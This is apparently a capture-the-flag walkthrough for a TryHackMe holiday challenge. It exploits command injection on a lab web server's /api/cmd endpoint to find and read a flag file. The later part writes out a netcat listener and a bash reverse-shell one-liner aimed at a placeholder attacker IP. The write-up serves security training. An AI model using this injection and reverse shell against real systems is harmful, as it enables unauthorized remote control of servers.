“Another day, another hack from the Christmas Monster. Can you get back control of the system?
Access the web server on http://[your-ip]:3000/
McSkidy actually found something interesting on the /api/cmd endpoint.”
For this challenge you will have to deploy the VM from the question and then use either OpenVPN or the THM virtual Kali Machine (if you are a subscriber) to connect to it. If you need instructions for how to do that, click HERE.
Question #1 What are the contents of the user.txt file?
After reading through the source material, we can see that today’s question will be about command injection attacks.
Let’s start by opening up our attacking machine and navigating to the web address provided:
It says that McSkidy found something at the /api/cmd endpoint. Let’s head there:
Hmm, looks like it just returns an error message. That’s OK, we can still use this to input a basic command and see if that works.
I just passed the ls command here, and look, it shows us details of the file system, which means that this endpoint is definitely vulnerable to command injection attacks.
I would also like to try whoami:
This returns the fact that we are root. Not good, McSkidy…
We will need to find a way to look through the file system and grab the “user.txt” file.
The command I am going to use is:
find -name “user.txt”
However, you need to encode it in a way that is URL friendly (they don’t handle spaces well). I like this simple tool HERE.
After you encode it, it will look like this:
This is what we will paste into the browser navigation bar:
Hit enter, and you should see something like this:
So we found the path to the file. Now we just need to open it. Let’s encode another basic command:
This will reveal our flag!
You could have also created a reverse shell here to control in your own terminal. If you prefer that or just want to know an alternative method, keep reading.
I found THIS tool to make it much simpler. Though they also gave you a link to another cheat sheet from Pentestmonkey in the source material.
First, set up a port to listen on:
nc -lvnp 4444
-l for listen, -v for verbose, -n means not to resolve hostnames via DNS , -p for the port we want.
Now, we generate our reverse shell.
bash -i >& /dev/tcp/<attacker ip>/4444 0>&1
We input that in the browser navigation bar like we were doing earlier. Remember to encode it!
If you head back to your terminal you will see that you now have control of a reverse shell:
You can enter in the same commands as last time to get the flag once again:
Happy Hacking! ❤